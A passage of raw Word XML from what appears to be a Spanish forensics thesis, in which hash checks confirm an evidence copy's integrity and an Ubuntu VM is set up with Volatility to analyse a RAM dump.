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&#10;JPJBBYv5Cwhvx/PXJYizglkcRSCzVP4/kP0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xLCRKIDAAAxCAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54&#10;bWxQSwECLQAKAAAAAAAAACEAOgE5T09xAABPcQAAFAAAAAAAAAAAAAAAAAAIBgAAZHJzL21lZGlh&#10;L2ltYWdlMS5wbmdQSwECLQAUAAYACAAAACEAkR497OAAAAAIAQAADwAAAAAAAAAAAAAAAACJdwAA&#10;ZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAA&#10;lngAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAiXkAAAAA&#10;">
                <v:shape id="Imagen 6" o:spid="_x0000_s1042" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:37369;height:1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RfHyAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4L/ocwhV5KzbpoqVujiCJUSgu1PfQ4JLMPupksSVbXf28KBY/zvWe5HmwrTuRD41jBdJKBINbO&#10;NFwp+P7aPz6DCBHZYOuYFFwowHo1Hi2xMO7Mn3Q6xkqkEA4FKqhj7Aopg67JYpi4jjhxpfMWYzp9&#10;JY3Hcwq3rcyz7ElabDg11NjRtib9e+ytAl2Gn+3HjnS/eyt9Lg/9u9k/KHV/N2xeQEQa4k387341&#10;af50sZhn+Syfw99PCQC5ugIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDYORfHyAAAAOMA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:imagedata r:id="rId104" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:38386;top:6211;width:15583;height:4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yPzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsZtoG5rYbSlFQb0UYy/eHtnXbDT7Nuxu2vjvXUHwOMzMN8xqM9lenMiHzrGCfJaB&#10;IG6c7rhVcHh/ul2CCBFZY++YFHxTgM368mKFlXZnfqNTHVuRIBwqVGBiHCopQ2PIYpi5gTh5R+ct&#10;xiR9K7XHc4LbXt5lWSEtdpwWDA60M9R81aNVsJ9/7M3NeHx83c7v/cth3BWfba3U9dW0fQARaYr/&#10;4b/2s1ZQLMt8kZflAn4vpTsg1z8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAGEMMj8wA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="49374C9E" w14:textId="4622D8F1" w:rsidR="00831684" w:rsidRPr="000B3212" w:rsidRDefault="00831684" w:rsidP="00831684">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>9</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="34" w:name="_Toc155782576"/>
                        <w:r w:rsidRPr="00FE2939">
                          <w:t>Captura imagen hash PowerShell.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="34"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000473CF" w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se puede observar en la siguiente imagen la respuesta de PowerShell de los hashes</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hashes: Plural de hash</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0473CF" w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de MD5 y SHA1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F34312" w14:textId="4FDAC088" w:rsidR="000D10AB" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como conclusión podemos verificar que la </w:t>
      </w:r>
      <w:r w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>integridad</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D52A79">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de la copia facilitada para realizar el TFM no ha sido vulnerada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D147389" w14:textId="49A2DE81" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3526FFC7" w14:textId="18728861" w:rsidR="000D10AB" w:rsidRDefault="00542C58" w:rsidP="00542C58">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc155782509"/>
      <w:r w:rsidRPr="00542C58">
        <w:t>3.2.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:t>Sistema Operativo de la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">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instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00542C58">
        <w:t xml:space="preserve"> analizada.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="131BBE22" w14:textId="066655F0" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BBB8696" w14:textId="69CBB7D3" w:rsidR="00542C58" w:rsidRPr="00542C58" w:rsidRDefault="00542C58" w:rsidP="00542C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Procedemos a preparar una VM con Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22.04, el cual le instalamos el volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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542C58">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> según en el enlace</w:t>
      </w:r>
      <w:r w:rsidR="004F35EE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:history="1">
        <w:r w:rsidR="00E162EE" w:rsidRPr="00612555">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=dCU6kIh0qSI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="742706AD" w14:textId="30C6DA38" w:rsidR="00542C58" w:rsidRPr="00542C58" w:rsidRDefault="00831684" w:rsidP="00542C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251894784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57AE5881" wp14:editId="7C3CAB25">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
